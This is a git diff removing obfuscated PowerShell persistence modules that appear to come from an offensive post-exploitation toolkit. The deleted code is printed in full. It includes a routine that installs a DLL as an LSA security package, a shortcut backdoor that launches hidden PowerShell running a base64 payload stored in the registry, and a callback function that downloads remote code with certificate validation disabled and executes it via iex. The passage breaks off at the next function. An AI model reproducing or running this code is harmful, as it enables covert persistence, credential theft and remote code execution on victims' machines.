diff --git a/data/obfuscated_module_source/persistance/.gitignore b/data/obfuscated_module_source/persistence/.gitignore similarity index 100% rename from data/obfuscated_module_source/persistance/.gitignore rename to data/obfuscated_module_source/persistence/.gitignore diff --git a/data/obfuscated_module_source/persistence/Get-SecurityPackages.ps1 b/data/obfuscated_module_source/persistence/Get-SecurityPackages.ps1 deleted file mode 100644 index c7c760e..0000000 --- a/data/obfuscated_module_source/persistence/Get-SecurityPackages.ps1 +++ /dev/null @@ -1,114 +0,0 @@ - SeT 8i53f ( [tYpe]("{0}{1}{2}{3}"-f'Appd','O','mA','In')) ; sET-itEM ('VAR'+'Iab'+'Le:4O'+'TI'+'R') ([tYpE]("{5}{3}{6}{1}{0}{7}{2}{4}"-F'sEmbl','It.as','UildEracC','E','Ess','R','flECTIoN.em','YB')) ; SEt-item VAriabLE:Tn86A ( [typE]("{0}{1}{3}{2}"-F 'fLA','gs','E','atTRiBUT') ) ; Set-itEm ("vARIABlE:w"+"2"+"i") ( [tYPe]("{3}{5}{6}{4}{2}{1}{0}" -f'NgsiZe','ki','PAC','reFL','it.','ECT','ioN.eM') ) ; $TDcp81= [TyPe]("{8}{4}{6}{1}{0}{7}{2}{3}{5}" -F'aLlI','n.C','nvEn','Ti','i','Ons','O','NgCo','ReFlEct'); SeT-ITeM vaRiAbLE:xGL ( [TyPE]("{1}{0}"-f 'nt32','i') ) ; $liW9 = [TyPE]("{11}{3}{2}{5}{1}{8}{6}{4}{9}{7}{10}{0}"-F 'IoN','.','Nti','U','l','Me','TeroPseRvICes.Ca','Ng','IN','li','cONvEnT','r'); sv x8o ( [TypE]("{4}{6}{7}{1}{5}{3}{2}{0}" -F 'ArsEt','Inte','.Ch','Es','RUnt','ropsERVIC','im','e.') ) ; $UmdQ8=[tYPE]("{1}{0}" -f 'tR','iNtp') ; $EHv6mU =[TYPe]("{4}{2}{8}{0}{7}{1}{5}{3}{6}" -F'S','Ces','me.Int','s','ruNTi','.maR','haL','erVi','ErOp') ; function Ge`T-s`ecURi`TyPac`KaG`es -{ - - - [CmdletBinding()] Param() - - - ${DYn`ASsEmb`ly} = New-Object ("{0}{1}{5}{3}{4}{2}"-f'S','yste','me','mblyN','a','m.Reflection.Asse')('SSPI') - ${ASsem`B`Ly`BuilDeR} = ( GI VARIable:8i53f)."v`ALUe"::"CURrENt`Do`M`AIn"."dEF`I`Ne`d`Yna`MiC`AsSemBly"(${dy`NaSs`eMBLy}, $4oTir::"r`Un") - ${M`OduLebu`IL`D`Er} = ${aSS`EmBlY`BU`iLd`er}."DEf`in`eDyNAMi`CmodU`le"('SSPI', ${fal`SE}) - - ${fl`A`gs`c`oNSTRuCtOR} = $tN86A."gE`T`ConStR`uC`ToR"(@()) - ${f`LAG`sC`Us`To`Ma`TTRIBute} = New-Object ("{3}{4}{0}{10}{1}{9}{7}{8}{6}{5}{2}"-f'le','ion.Emi','r','Re','f','Builde','te','.C','ustomAttribu','t','ct')(${f`lA`gS`cO`NsTRU`CtoR}, @()) - ${STrucT`A`T`Tr`IBuT`es} = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit' - - ${e`NumB`UILDer} = ${MO`duleBU`IL`DER}."D`ef`inE`eNum"('SSPI.SECPKG_FLAG', 'Public', [Int32]) - ${E`NuMBUi`l`deR}."sETCU`sToM`AtTRibu`TE"(${Fl`AgS`CUStOmat`T`Ri`BUTe}) - ${n`ULL} = ${enumB`Ui`lD`er}."def`ine`LiTeRaL"('INTEGRITY', 1) - ${N`uLL} = ${enUmb`uILD`Er}."D`ef`In`EL`itERal"('PRIVACY', 2) - ${N`uLl} = ${enuM`Bu`iL`Der}."dEfIneLITE`R`AL"('TOKEN_ONLY', 4) - ${N`uLL} = ${E`NuMbuI`ldER}."DEFiNEL`Iter`AL"('DATAGRAM', 8) - ${n`ULL} = ${en`umbUi`l`dER}."def`IN`ElITErAl"('CONNECTION', 0x10) - ${nU`lL} = ${EN`umBU`Il`Der}."d`EfinEL`iT`eRAl"('MULTI_REQUIRED', 0x20) - ${nU`lL} = ${e`NUMbUiLD`ER}."DeF`IN`eliTeRAL"('CLIENT_ONLY', 0x40) - ${NU`ll} = ${e`NUm`BUi`LdeR}."DEfin`el`i`TerAL"('EXTENDED_ERROR', 0x80) - ${Nu`ll} = ${EnU`mBUil`D`ER}."dEfi`NELi`TeR`Al"('IMPERSONATION', 0x100) - ${nu`ll} = ${e`NumbU`iLd`ER}."DefIN`e`liTERal"('ACCEPT_WIN32_NAME', 0x200) - ${N`Ull} = ${ENu`MbUiLD`ER}."DeFINe`LIT`e`RAL"('STREAM', 0x400) - ${nU`LL} = ${E`NUmBuil`DER}."d`E`F`InELITERaL"('NEGOTIABLE', 0x800) - ${N`ULL} = ${EnUM`Bu`i`ldEr}."dE`FINE`LITeRaL"('GSS_COMPATIBLE', 0x1000) - ${nU`Ll} = ${enuMb`uILD`eR}."DefiNElITE`R`Al"('LOGON', 0x2000) - ${nU`ll} = ${EnU`Mb`u`ilder}."d`eFiNe`lIt`ErAl"('ASCII_BUFFERS', 0x4000) - ${NU`Ll} = ${en`UMBuil`DER}."DE`FinE`Lit`erAl"('FRAGMENT', 0x8000) - ${n`ULL} = ${E`NumB`uI`lder}."dEf`inElit`Eral"('MUTUAL_AUTH', 0x10000) - ${NU`LL} = ${E`NuMbUIL`D`er}."dEfiNEL`I`TE`RaL"('DELEGATION', 0x20000) - ${N`ulL} = ${en`uMbuI`LDER}."DefIn`El`iTeRAl"('READONLY_WITH_CHECKSUM', 0x40000) - ${n`ULL} = ${EN`uM`BuIl`DeR}."deFI`NEl`Ite`RaL"('RESTRICTED_TOKENS', 0x80000) - ${n`uLL} = ${enU`mbu`ILD`Er}."De`FInel`iteR`AL"('NEGO_EXTENDER', 0x100000) - ${Nu`ll} = ${EN`Um`BuILD`Er}."D`eFIN`eL`ITeRAl"('NEGOTIABLE2', 0x200000) - ${n`ULL} = ${eN`um`BUILdeR}."D`EfINe`lItERAl"('APPCONTAINER_PASSTHROUGH', 0x400000) - ${n`ull} = ${ENuMBU`I`lDeR}."d`EfIn`eLi`Te`RAL"('APPCONTAINER_CHECKS', 0x800000) - ${se`C`PKg_`FLag} = ${EnuM`B`UILdEr}."cReATET`y`pE"() - - ${tYp`eBuiL`Der} = ${M`o`d`UL`ebUILDEr}."DE`Fi`NETYpe"('SSPI.SecPkgInfo', ${sTRUC`Ta`TTrIBuT`es}, [Object], (get-VArIAbLE ('W2'+'i') -vAl )::"siZ`e8") - ${N`ulL} = ${ty`Pebui`LDEr}."d`eF`IN`eFIelD"('fCapabilities', ${S`EC`PKg_FL`AG}, 'Public') - ${NU`Ll} = ${t`y`peBu`ILder}."De`FiN`e`FieLD"('wVersion', [Int16], 'Public') - ${Nu`lL} = ${T`yP`E`BUIldER}."De`FInEFI`Eld"('wRPCID', [Int16], 'Public') - ${N`UlL} = ${typE`BuIL`dER}."D`eFI`NEFIElD"('cbMaxToken', [Int32], 'Public') - ${n`Ull} = ${T`ypEBu`il`DER}."DE`FiN`EF`iELD"('Name', [IntPtr], 'Public') - ${Nu`ll} = ${T`YpE`BUild`ER}."d`e`FInEfieLD"('Comment', [IntPtr], 'Public') - ${S`e`CpKG`INFo} = ${tyPebUI`l`d`eR}."c`R`eaTETyPE"() - - ${tyPe`BUi`ldeR} = ${m`Odulebui`l`der}."D`efIne`TYPe"('SSPI.Secur32', 'Public, Class') - ${piNvo`kE`me`T`hOD} = ${TYpE`B`uildER}."de`F`iNEp`i`NvokeMethod"('EnumerateSecurityPackages', - 'secur32.dll', - 'Public, Static', - ( geT-iTeM ('vARiaBL'+'E:tD'+'cP8'+'1') )."v`AlUe"::"s`T`Andard", - [Int32], - [Type[]] @( ( get-VARiaBlE XgL )."V`AlUE"."maKE`BYrEfT`YPE"(), - ( VARiabLE ("U"+"mDQ8") )."va`LuE"."MAKe`BYR`E`FTypE"()), - (Item ('v'+'A'+'RiaBL'+'E:lIW9'))."vAl`UE"::"wI`NAPI", - (VaRIaBLE X8o -VaL )::"A`NsI") - - ${s`e`CUR32} = ${typ`Ebu`iLdEr}."crEA`T`e`TYpe"() - - ${PAC`kAGEc`ount} = 0 - ${PAcK`AgeARraY`P`Tr} = ( GET-varIablE ("UMdQ"+"8") )."v`Alue"::"zE`Ro" - ${r`e`sUlT} = ${sEC`uR`32}::"EnU`m`E`RATeS`e`cU`RitY`pACKAGEs"([Ref] ${p`AckagE`couNt}, [Ref] ${p`ACkAGE`AR`RAypTr}) - - if (${R`E`Sult} -ne 0) - { - throw "Unable to enumerate seucrity packages. Error (0x$($Result.ToString('X8')))" - } - - if (${pA`CkA`ge`cOUnt} -eq 0) - { - Write-Verbose 'There are no installed security packages.' - return - } - - ${s`T`RucTaDdRe`SS} = ${paCK`A`GeaRr`AyPtr} - - foreach (${I} in 1..${PaC`kAgec`O`u`Nt}) - { - ${SeCpaC`kagES`T`R`u`Ct} = ( gi ('VARIa'+'bLe:EhV6'+'M'+'u'))."V`AluE"::"PTrt`osTr`uctu`Re"(${s`TRU`cT`ADd`REsS}, [Type] ${SECP`KG`infO}) - ${STR`ucT`ADDRE`Ss} = [IntPtr] (${sTRUc`TaddrE`Ss}."TO`INt64"() + $ehV6Mu::"SiZE`OF"([Type] ${se`C`Pkg`INFo})) - - ${na`ME} = ${NU`LL} - - if (${seCP`Ac`KaGeS`TrU`ct}."n`AME" -ne (dIR ('varI'+'A'+'ble'+':'+'uMdq8'))."VAl`uE"::"ze`Ro") - { - ${n`Ame} = (geT-cHiLdiTEM ("vaRIabl"+"e:e"+"H"+"V6mu"))."V`AluE"::"p`TRt`ostRiNg`A`NSI"(${s`eCpack`AGeSTR`UCt}."na`Me") - } - - ${C`Omm`eNt} = ${N`UlL} - - if (${S`Ec`P`ACkA`GeStru`ct}."COmm`ent" -ne ( gi ("vaRI"+"ab"+"Le"+":UMd"+"Q8") )."VAL`UE"::"Z`ERO") - { - ${C`oMMeNt} = (varIAbLE Ehv6mu )."va`LUE"::"PTR`T`oSTr`InGan`SI"(${SE`C`pacK`AGE`St`RUcT}."cOMmE`NT") - } - - ${AT`TrIbUt`Es} = @{ - "nA`me" = ${Na`ME} - "Co`MmeNT" = ${c`omme`Nt} - "Cap`Abil`iTI`es" = ${s`E`CP`AcKAG`ES`TrucT}."FCaP`Ab`Il`IT`iES" - "MA`Xto`KenSiZe" = ${seCp`Ac`K`A`GestRUCT}."C`BM`AxToKen" - } - - ${SE`cP`AcKA`GE} = New-Object ("{2}{1}{0}"-f 't','c','PSObje') -Property ${A`TT`R`iBUteS} - ${sECpacK`A`Ge}."PS`o`Bject"."Typ`e`NamEs"[0] = 'SECUR32.SECPKGINFO' - - ${Sec`pACka`ge} - } -} \ No newline at end of file diff --git a/data/obfuscated_module_source/persistence/Install-SSP.ps1 b/data/obfuscated_module_source/persistence/Install-SSP.ps1 deleted file mode 100644 index 0eb4b2a..0000000 --- a/data/obfuscated_module_source/persistence/Install-SSP.ps1 +++ /dev/null @@ -1,171 +0,0 @@ - ${Y`cDt} = [tYpe]("{4}{3}{6}{7}{5}{1}{0}{2}" -f'en','pal.windowSId','Tity','ecuR','S','CI','I','TY.pRin') ; Set-vaRIAbLE ("{1}{0}" -f'rj','f') ( [tYpe]("{0}{2}{6}{1}{7}{4}{3}{8}{5}"-f 'S','Y.PrInCI','eCuRi','bUIL','Ows','LE','T','pal.WINd','tINro') ) ; ${X`kW} = [tYPe]("{2}{1}{3}{0}" -F'IlemOdE','StEM','Sy','.io.f') ; sV ('x1'+'uO') ( [TYPE]("{0}{4}{2}{6}{1}{3}{5}" -F'SyStEM','c','.fiLe','C','.iO','Ess','A')) ; Set-IteM ("varIaBLe:u"+"W"+"b") ( [TYpe]("{1}{0}{4}{3}{2}"-f'.','sySTEm','Ng','OdI','TeXt.asCiienc') ) ;${60Oc} = [TYpE]("{6}{2}{1}{3}{4}{0}{5}"-f'koRig','M.io.S','te','e','E','iN','SYs'); sV ('yAp'+'vd') ( [TyPE]("{2}{1}{0}"-F'MaIN','dO','App') ) ; ${8d`B6O5}=[TYpE]("{1}{3}{6}{2}{0}{4}{5}" -f 'emBlybu','Ref','.ASS','LE','IlD','ERACCESS','CTIon.emit'); Set-ITEm ("vAr"+"Iable:"+"T"+"8Cg") ([TyPe]("{3}{5}{7}{0}{6}{4}{8}{2}{1}"-f 'o','onS','TI','Ref','al','lECT','n.c','I','lINgcoNVEn') ) ; SET-vAriAbLe ("{0}{1}" -f '0','zs') ( [type]("{2}{7}{0}{6}{5}{1}{3}{4}"-f'Me.','eRvIce','rUn','S.CaLlI','NgcONVEnTIoN','Terops','IN','TI') ); SEt ("{0}{1}" -f 'N','5m') ( [tYPE]("{0}{5}{4}{6}{8}{2}{7}{3}{1}"-F'ru','harSEt','PserV','.C','tIM','N','E.','IcES','iNTERo') ) ;${c`7fb`dZ} = [TyPE]("{0}{2}{1}"-F 'I','TPtr','n');${6`O0hvP}= [TYPE]("{3}{0}{2}{5}{1}{7}{4}{6}" -f'u','in','NtIme','R','icES.MaRshA','.','l','teropSerV') ;function INStAl`l-`S`sP -{ - - - [CmdletBinding()] Param ( - [ValidateScript({Test-Path (Resolve-Path ${_})})] - [String] - ${p`Ath} - ) - - ${PrI`N`ciPaL} = [Security.Principal.WindowsPrincipal] ${yc`dt}::"G`EtCuRRe`Nt"() - - if(-not ${P`RI`NC`IPal}."I`SinRolE"( (GI ("{3}{0}{2}{1}" -f 'ARi','Le:frj','ab','V')).VAlUe::"Adm`I`NisTR`At`OR")) - { - throw 'Installing an SSP dll requires administrative rights. Execute this script from an elevated PowerShell prompt.' - } - - - ${FUlLDLl`p`A`Th} = Resolve-Path ${Pa`TH} - - - function LOCAl:g`Et-peaRcHItE`C`TU`Re - { - Param - ( - [Parameter( pOsITion = 0, - MandATory = ${TR`Ue} )] - [String] - ${pA`Th} - ) - - - ${Fil`e`S`TreaM} = New-Object ("{3}{0}{1}{2}{4}" -f 's','tem.I','O.FileS','Sy','tream')(${Pa`Th}, ${X`KW}::"Op`eN", (gi ('Va'+'r'+'iaB'+'lE'+':x1uO')).vALUe::"rE`Ad") - - [Byte[]] ${m`zHe`A`der} = New-Object ("{0}{1}" -f 'Byte','[]')(2) - ${F`IL`eS`TrEAM}."RE`AD"(${m`Zhe`ADER},0,2) | Out-Null - - ${h`EA`dER} = ( childITEM ("VarIabLE:u"+"w"+"B") ).VaLue::"aS`CII"."gEt`StRi`Ng"(${M`ZHEad`ER}) - if (${hE`AdEr} -ne 'MZ') - { - ${F`IlE`sTRe`AM}."cLo`se"() - Throw 'Invalid PE header.' - } - - - ${Fi`lEST`REAM}."S`eeK"(0x3c, ( geT-ChilDItem ("{1}{0}{3}{4}{2}" -f 'Le','VARIAB','C',':','60O')).Value::"BE`GIn") | Out-Null - - [Byte[]] ${L`FaN`EW} = New-Object ("{1}{0}"-f ']','Byte[')(4) - - - ${F`IlEs`TreAm}."RE`AD"(${Lf`AnEw},0,4) | Out-Null - ${PEoF`FS`et} = [Int] ('0x{0}' -f (( ${l`F`AnEW}[-1..-4] | % { ${_}."tOst`R`ING"('X2') } ) -join '')) - - - ${FIl`eStrE`AM}."se`ek"(${pE`o`FFSEt} + 4, ( Ls ("v"+"aRIAb"+"L"+"e:60OC") ).ValUe::"b`eGin") | Out-Null - [Byte[]] ${i`mAGE_`File_`m`ACh`iNe} = New-Object ("{2}{0}{1}" -f'e[',']','Byt')(2) - - - ${FI`Les`TRE`Am}."rE`AD"(${ImAGe_`File`_`M`Ach`Ine},0,2) | Out-Null - ${aRch`ITeC`T`URE} = '{0}' -f (( ${ImaGe_`FiL`E`_mACHiNe}[-1..-2] | % { ${_}."Tost`RInG"('X2') } ) -join '') - ${FI`LESt`Ream}."Cl`ose"() - - if ((${A`RcHi`TeCtu`RE} -ne '014C') -and (${aRC`hiteCT`uRe} -ne '8664')) - { - Throw 'Invalid PE header or unsupported architecture.' - } - - if (${ARcHi`TECTu`Re} -eq '014C') - { - Write-Output '32-bit' - } - elseif (${archIT`ec`TUre} -eq '8664') - { - Write-Output '64-bit' - } - else - { - Write-Output 'Other' - } - } - - ${DL`larchiT`Ec`TUre} = Get-PEArchitecture ${fu`L`ld`LlPath} - - ${OS`ARcH} = Get-WmiObject ("{1}{6}{3}{2}{0}{5}{4}" -f 'erating','Wi','Op','2_','tem','Sys','n3') | Select-Object -ExpandProperty ("{0}{2}{1}"-f'O','ture','SArchitec') - - if (${d`ll`ArcH`itE`CTURE} -ne ${O`SArcH}) - { - throw 'The operating system architecture must match the architecture of the SSP dll.' - } - - ${D`Ll} = Get-Item ${FULl`D`LlP`ATH} | Select-Object -ExpandProperty ("{1}{0}" -f 'e','Nam') - - - - ${dLl`N`Ame} = ${D`ll} | % { % {(${_} -split '\.')[0]} } - - - ${sec`urI`Typa`ck`AgES} = Get-ItemProperty (("{8}{2}{10}{6}{5}{4}{12}{11}{1}{7}{0}{3}{9}" -f 'olSet','n','M:rAUSYST','rAUCon','r','UCu','MrA','tr','HKL','trolrAULsa','E','ntCo','re')).REPLacE('rAU','\') -Name 'Security Packages' | - Select-Object -ExpandProperty 'Security Packages' - - if (${SeCUR`ITy`p`AcK`A`gEs} -contains ${dLlN`A`me}) - { - throw "'$DllName' is already present in HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages." - } - - - ${N`ATive`I`NStA`L`lDir} = "$($Env:windir)\Sysnative" - - if (Test-Path ${NatIVe`iNsta`l`LdIR}) - { - ${iNst`AL`lD`Ir} = ${nativ`eI`Ns`TalLDIR} - } - else - { - ${iNSta`l`l`dIR} = "$($Env:windir)\System32" - } - - if (Test-Path (Join-Path ${iNstA`L`LD`IR} ${d`ll})) - { - throw "$Dll is already installed in $InstallDir." - } - - - Copy-Item ${ful`L`dlLp`AtH} ${INStAll`D`Ir} - - ${S`ecuRit`ypAcKA`gES} += ${dl`L`Name} - - Set-ItemProperty ((("{1}{8}{0}{4}{2}{9}{5}{6}{7}{10}{3}" -f 'Y','HKLM:','QD1CurrentContro','1Lsa','STEM','etQ','D1Contro','lQ','QD1S','lS','D')) -cRePLace 'QD1',[cHAR]92) -Name 'Security Packages' -Value ${SEC`U`RityP`ACkages} - - ${DYnaS`S`eMblY} = New-Object ("{0}{1}{7}{4}{2}{5}{6}{3}" -f 'S','yste','e','Name','R','flecti','on.Assembly','m.')('SSPI2') - ${assE`M`BLyBUil`Der} = ${yAP`Vd}::"CU`Rre`NtDoma`IN"."de`FI`NED`y`NAmIcaS`semb`LY"(${dyna`S`Sem`BLY}, ( DiR ("{0}{1}{3}{2}{4}" -f'vaR','iAb','8d','le:','B6o5') ).vALUe::"r`uN") - ${M`odULebUi`lder} = ${Assem`B`LYbu`I`LDEr}."deF`inEDyna`mI`cmOD`u`LE"('SSPI2', ${faL`sE}) - - ${Ty`PebuILD`er} = ${MODUL`eBU`Il`DER}."De`F`inE`TYpe"('SSPI2.Secur32', 'Public, Class') - ${PIn`V`OKE`m`eTHOD} = ${TY`pEbuiL`deR}."De`FinePINvo`kEm`E`THoD"('AddSecurityPackage', - 'secur32.dll', - 'Public, Static', - ${T8`Cg}::"stA`ND`ARD", - [Int32], - [Type[]] @([String], [IntPtr]), - ( gET-VarIABle ("{1}{0}" -f 'ZS','0') -ValUeonl )::"WInA`PI", - ${n`5M}::"AU`TO") - - ${S`Ecu`R32} = ${TYp`e`BUI`lDEr}."C`REaTET`YpE"() - - if ( ( vaRiAble ('c'+'7FbDZ') ).VAlUe::"S`Ize" -eq 4) { - ${S`Tructs`i`ZE} = 20 - } else { - ${S`TrucTs`ize} = 24 - } - - ${S`T`RUctpTr} = ( gI ("{1}{4}{3}{0}{2}"-f '0','v','hVp','BlE:6O','ARIa') ).VALUE::"AL`lo`cHgLObal"(${str`Uct`SIzE}) - ( chILDITeM ("{2}{1}{0}{3}"-f'O0H','riaBLE:6','VA','VP') ).Value::"wrIT`e`iNt32"(${st`R`u`CTptr}, ${sTru`C`TSI`Ze}) - - ${runTI`M`eSUC`Ce`SS} = ${t`Rue} - - try { - ${rE`SU`lt} = ${s`Ec`ur32}::"AddS`E`c`U`RitypAck`Age"(${dLl`N`AME}, ${STRuC`T`pTR}) - } catch { - ${hR`e`sult} = ${er`ROR}[0]."Excep`Ti`ON"."I`NnE`R`eXCePT`ioN"."HrESU`LT" - Write-Warning "Runtime loading of the SSP failed. (0x$($HResult.ToString('X8')))" - Write-Warning "Reason: $(([ComponentModel.Win32Exception] $HResult).Message)" - ${RUN`TiMES`Uc`cE`SS} = ${f`AlsE} - } - - if (${Ru`NT`iMESU`cCEsS}) { - Write-Verbose 'Installation and loading complete!' - } else { - Write-Verbose 'Installation complete! Reboot for changes to take effect.' - } -} \ No newline at end of file diff --git a/data/obfuscated_module_source/persistence/Invoke-BackdoorLNK.ps1 b/data/obfuscated_module_source/persistence/Invoke-BackdoorLNK.ps1 deleted file mode 100644 index 8e13fe4..0000000 --- a/data/obfuscated_module_source/persistence/Invoke-BackdoorLNK.ps1 +++ /dev/null @@ -1,76 +0,0 @@ - ${0`4Dp}= [tYpe]("{0}{2}{4}{3}{1}" -F'sys','ding','teM.TE','ENCo','xt.') ; ${x`8Yn9} = [typE]("{0}{4}{3}{2}{1}"-F 'Sy','t','NVer','Tem.Co','S'); function iN`VOKe-BaCkdoO`Rl`NK { - - - [CmdletBinding()] Param( - [Parameter(vaLueFrOMPIPeLINe=${T`Rue}, MAnDAtory = ${t`RuE})] - [ValidateScript({Test-Path -Path ${_} })] - [String] - ${l`NkpATh}, - - [String] - ${ENcs`cr`IpT}, - - [String] - ${rEG`pA`TH} = 'HKCU:\Software\Microsoft\Windows\debug', - - [Switch] - ${C`LEANUp} - ) - - ${ReG`pa`Rts} = ${REG`pA`TH}."sp`LIT"("\") - ${PA`Th} = ${r`e`GpaRtS}[0..(${r`EGp`Ar`TS}."c`OUnt"-2)] -join "\" - ${N`AmE} = ${RE`Gp`ArTS}[-1] - - - ${o`Bj} = New-Object -ComObject ("{0}{2}{1}"-f'WScri','ll','pt.She') - ${l`Nk} = ${o`Bj}."crE`At`esHo`Rtcut"(${LNK`pa`Th}) - - - ${Targ`e`T`patH} = ${L`NK}."tA`RgE`TpA`Th" - ${W`Ork`iN`g`DIRECTory} = ${l`NK}."WOrkING`DIr`Ec`T`oRy" - ${icOn`LOCat`Ion} = ${L`NK}."Ic`oN`LO`cATION" - - if(${CL`eAnUp}) { - - - ${ORIg`I`NAl`p`ATh} = (${ic`onl`o`caTiOn} -split ",")[0] - - ${l`NK}."tArg`eTPA`Th" = ${ORiGI`NALP`ATh} - ${L`Nk}."ArgU`m`ents" = ${Nu`LL} - ${l`NK}."w`ind`o`wstylE" = 1 - ${L`Nk}."s`AvE"() - - - ${N`uLL} = Remove-ItemProperty -Force -Path ${Pa`Th} -Name ${N`AmE} - } - else { - - if(!${enC`scr`ipt} -or ${e`N`cSC`RIpT} -eq '') { - throw "-EncScript or -Cleanup required!" - } - - - ${Nu`Ll} = Set-ItemProperty -Force -Path ${p`ATH} -Name ${N`AMe} -Value ${en`CSCRI`PT} - - "[*] B64 script stored at '$RegPath'`n" - - - ${L`Nk}."Ta`RGEtpa`TH" = "$env:SystemRoot\System32\WindowsPowerShell\v1.0\powershell.exe" - - - ${L`A`uNch`StR`iNG} = '[System.Diagnostics.Process]::Start("'+${T`ArGetp`AtH}+'");IEX ([Text.Encoding]::UNICODE.GetString([Convert]::FromBase64String((gp '+${P`AtH}+' '+${nA`Me}+').'+${na`ME}+')))' - - ${LAU`N`c`HBYteS} = ( cHiLdITem ("{4}{3}{2}{0}{1}"-f'4','dP',':0','iaBLE','VaR') )."v`Alue"::"UN`icode"."gETB`Y`TEs"(${LAun`cH`STRI`Ng}) - ${laUnC`H`B64} = ( dIr ("v"+"ar"+"iABLE:x8y"+"N9") )."v`ALuE"::"T`OBAse`64STri`Ng"(${LaU`Nchby`T`es}) - - ${L`Nk}."a`Rg`UMEnts" = "-w hidden -nop -enc $LaunchB64" - - - ${L`Nk}."WorK`INGdIR`e`C`ToRY" = ${W`oR`KInGdIrEc`TORy} - ${l`Nk}."I`c`OnLocA`TION" = "$TargetPath,0" - ${l`Nk}."wIN`dow`STy`le" = 7 - ${L`NK}."SA`VE"() - - "[*] .LNK at $LNKPath set to trigger`n" - } -} \ No newline at end of file diff --git a/data/obfuscated_module_source/persistence/PowerBreach.ps1 b/data/obfuscated_module_source/persistence/PowerBreach.ps1 deleted file mode 100644 index 91fe1df..0000000 --- a/data/obfuscated_module_source/persistence/PowerBreach.ps1 +++ /dev/null @@ -1,583 +0,0 @@ - $5kzyIT = [TYpE]("{4}{0}{1}{2}{3}" -F'e','t.SErV','I','CEPoinTmanAGeR','sySTem.n') ; $nzV2aP =[tyPe]("{1}{3}{2}{4}{0}"-F 'Rt','SYs','n','tEm.Co','vE') ; seT ('T'+'1o5') ( [Type]("{0}{3}{1}{2}" -f'sysTEM.T','nC','oding','exT.e') ) ;SeT-ITEM ("{3}{2}{0}{1}{4}" -f':Tr','i','bLe','varIa','XE') ( [tYPe]("{0}{3}{2}{1}"-F'sysTEm','s','.Dn','.neT') ) ; seT ("ZN"+"u") ( [type]("{2}{1}{3}{4}{5}{0}{6}" -F 't','ecURitY.PRiNC','s','ipAL.wInDoWs','ID','en','itY')) ; SET-itEm ("VArIABle"+":q8WgP"+"c") ( [TypE]("{0}{1}"-f'rE','gEX')) ; Sv ("{1}{0}" -f 'iUY','l8f') ([typE]("{3}{2}{4}{1}{0}" -f 'EtS.aDDReSsFaMIlY','K','t','NE','.SOc'));sEt-iteM ("{0}{3}{2}{1}"-f 'vaRiAb','pVj','4','lE:26') ( [typE]("{0}{5}{2}{4}{3}{1}"-F'nET.S','kettYpE','cKeTS.','Oc','s','o') ) ; SEt-IteM ("{2}{0}{3}{1}"-f 'blE','ACs','VArIa',':E') ([TYPE]("{2}{4}{3}{6}{1}{5}{0}{7}" -F'lT','o','neT.sO','KeT','c','TOcO','S.Pr','yPE') ); set-iTEM ("{3}{2}{0}{1}" -f 'bLE:','jMHB','aRiA','v') ([TYpE]("{1}{6}{2}{3}{5}{4}{0}" -F'e','NET','SOCkeTS','.IOCOnt','D','rOLCO','.')) ; sET-ITem ("vA"+"rIabLE:y"+"4"+"h"+"br") ( [tYpe]("{0}{1}{3}{4}{2}"-f 'NeT.SO','CKeTs.socKETFL','S','A','G')); Sv ("I6S"+"5nr") ( [tYpE]("{0}{1}{2}"-f'daT','ET','Ime')); - - - - - - - -function iNv`okE-Ca`LlbAck`IEx -{ - - Param( - [Parameter(mANDatOry=${Tr`uE},poSitION=1)] - [string]${cAl`l`BAcKip}, - [Parameter(mandatoRy=${Fa`LSE},poSitIoN=2)] - [int]${me`T`hOD}=0, - [Parameter(MAndaToRy=${F`AlSE},posITION=3)] - [string]${bI`TSt`eMPFi`Le}="$env:temp\ps_conf.cfg", - [Parameter(mANDAtOrY=${F`ALse},POsiTIoN=4)] - [string]${R`E`SouRCe}="/favicon.ico", - [Parameter(MaNDaTory=${FA`lsE},POsITIon=5)] - [bool]${sI`lENT}=${f`A`lSE} - ) - - - if(${c`All`Ba`ckIP}) - { - try { - - if (${Met`H`OD} -eq 0) - { - - ${u`RL}="http://$CallbackIP$resource" - if(-not ${SiL`enT}) {write-host "Calling home with method $method to: $url"} - - ${e`NC} = (new-object ("{2}{0}{1}"-f 't','.webclient','ne'))."dOwn`loA`D`String"(${U`Rl}) - } - - elseif (${meT`h`od} -eq 1) - { - $5KZYIt::"S`eRv`e`RC`e`RTiFIcatEVali`DATiON`cAlLB`A`ck" = {${tr`ue}} - ${u`RL}="https://$CallbackIP$resource" - if(-not ${s`IlenT}) {write-host "Calling home with method $method to: $url"} - - ${E`Nc} = (new-object ("{0}{2}{1}"-f'net.','client','web'))."DO`WnlOaD`St`Ring"(${u`RL}) - } - - elseif (${me`TH`oD} -eq 2) - { - ${u`RL}="http://$CallbackIP$resource" - if(-not ${s`iL`EnT}) { write-host "Calling home with method $method to: $url" - write-host "BITS Temp output to: $BitsTempFile"} - Import-Module ("{0}{1}" -f '*','bits*') - Start-BitsTransfer ${u`RL} ${biTS`T`EM`p`FIle} -ErrorAction ("{1}{0}" -f'op','St') - - ${e`NC} = Get-Content ${biT`StEMp`FILe} -ErrorAction ("{1}{0}"-f'p','Sto') - - - Remove-Item ${B`It`St`eMpF`iLe} -ErrorAction ("{1}{3}{2}{0}"-f 'tinue','Si','entlyCon','l') - - } - else - { - if(-not ${s`I`leNt}) { write-host "Error: Improper callback method" -fore ("{1}{0}"-f 'ed','r')} - return 0 - } - - - if (${e`Nc}) - { - - ${B} = (Gi ("{0}{1}{3}{2}"-f'VarIA','BLe:nz','p','v2A') ).vALuE::"f`RombAS`E64`stR`ING"(${E`NC}) - ${D`Ec} = ( gI ("VArIA"+"ble"+":T1o5")).VaLuE::"U`Tf8"."gETStr`i`NG"(${b}) - - - iex ${D`EC} - } - else - { - if(-not ${s`ILE`Nt}) { write-host "Error: No Data Downloaded" -fore ("{0}{1}"-f'r','ed')} - return 0 - } - } - catch [System.Net.WebException]{ - if(-not ${sIl`Ent}) { write-host "Error: Network Callback failed" -fore ("{0}{1}" -f'r','ed')} - return 0 - } - catch [System.FormatException]{ - if(-not ${s`IlE`NT}) { write-host "Error: Base64 Format Problem" -fore ("{1}{0}" -f 'ed','r')} - return 0 - } - catch [System.Exception]{ - if(-not ${S`ILEnt}) { write-host "Error: Uknown problem during transfer" -fore ("{0}{1}" -f 'r','ed')} - - return 0 - } - } - else - { - if(-not ${sile`NT}) { write-host "No host specified for the phone home :(" -fore ("{1}{0}"-f'ed','r')} - return 0 - } - - return 1 -} - -function Ad`D-PS`FIrE`wA`LLru`Les 